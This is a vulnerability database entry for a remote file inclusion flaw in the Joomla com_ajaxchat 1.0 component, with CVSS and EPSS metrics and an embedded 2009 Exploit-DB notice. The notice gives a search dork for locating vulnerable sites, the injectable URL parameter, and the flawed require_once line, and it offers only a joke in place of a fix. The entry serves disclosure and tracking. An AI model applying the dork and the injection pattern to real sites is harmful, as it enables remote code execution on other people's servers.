Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 9888
Publication date : 2009-10-18 22h00 +00:00
Author : kaMtiEz
EDB Verified : Yes
#############################################################################################################
## Joomla Component com_ajaxchat Remote File Include vulnerability ##
## Author : kaMtiEz (kamzcrew@gmail.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 27, 2009 ##
#############################################################################################################
# Hello My Name Is : ##
# __ _____ __ ._____________ ##
# | | _______ / \_/ |_|__\_ _____/_______ ##
# | |/ /\__ \ / \ / \ __\ || __)_\___ / ##
# | < / __ \_/ Y \ | | || \/ / ##
# |__|_ \(____ /\____|__ /__| |__/_______ /_____ \ ##
# \/ \/ \/ \/ \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=- ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://www.fijiwebdesign.com/
[+] Download : http://www.fijiwebdesign.com/
[+] version : 1.0 -
[+] Vulnerability : RFI
[+] price : $49.95
[+] Dork : inurl:"com_ajaxchat"
[+] Location : INDONESIA
#############################################################################################################
[ Vulnerable File ]
http://127.0.0.1/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]
[ BUG IN ]
ajcuser.php
error in line 7
// include our comprofiler class
require_once($GLOBALS['mosConfig_absolute_path'].'/components/com_ajaxchat/plugins/plugin.user.php');
[ FIX ]
Tukulesto said : ask to Aurakasih .. lol
kaMtiEz said : tanya ama AuraKasih .. hha
M3Nw5 said : takon Karo AuraKasih .. hha
Arianom Said : coba kau tanya aura kasih lae
Joke.. ;)
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!
[ NOTE ]
[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^
Products Mentioned
Configuraton 0
Joomla>>Joomla\! >> Version *
Fijiwebdesign>>Com_ajaxchat >> Version 1.0
References